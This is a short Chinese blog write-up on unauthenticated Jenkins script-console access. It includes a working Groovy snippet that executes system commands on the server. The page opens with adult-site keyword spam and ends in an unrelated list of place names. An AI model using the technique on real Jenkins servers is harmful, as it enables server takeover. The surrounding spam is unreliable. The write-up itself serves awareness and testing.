中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

jenkins 未授權訪問-任意命令執行

發布時間:2020-06-17 21:46:55 來源:網絡 閱讀:58357 作者:wx5b0b88843cb2a 欄目:安全技術

jenkins 未授權訪問-任意命令執行

0x00 jenkins簡介

enkins是一個功能強大的應用程序,允許持續集成和持續交付項目,無論用的是什么平臺。這是一個免費的源代碼,可以處理任何類型的構建或持續集成。集成Jenkins可以用于一些測試和部署技術。Jenkins是一種軟件允許持續集成。

0x01 漏洞原因

jenkins 未設置帳號密碼,或者使用了弱帳號密碼

0x02 漏洞復現

在默認情況下Jenkins面板中用戶可以選擇執行腳本界面來操作一些系統層命令,×××者可通過未授權訪問漏洞或者暴力破解用戶密碼等進腳本執行界面從而獲取服務器權限。
任意命令執行界面:
http://ip:port/script

println "ifconfig".execute().text

jenkins 未授權訪問-任意命令執行

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

交城县| 墨江| 昌平区| 甘谷县| 郸城县| 扶余县| 驻马店市| 克拉玛依市| 贵溪市| 石家庄市| 英山县| 永年县| 五常市| 明溪县| 磐安县| 遂昌县| 翼城县| 杭锦后旗| 玉环县| 沛县| 佛教| 黄大仙区| 佛学| 类乌齐县| 海丰县| 海阳市| 武乡县| 武宣县| 江都市| 长沙市| 盐山县| 阳朔县| 西宁市| 卢龙县| 光山县| 区。| 甘南县| 伊川县| 融水| 临城县| 湖州市|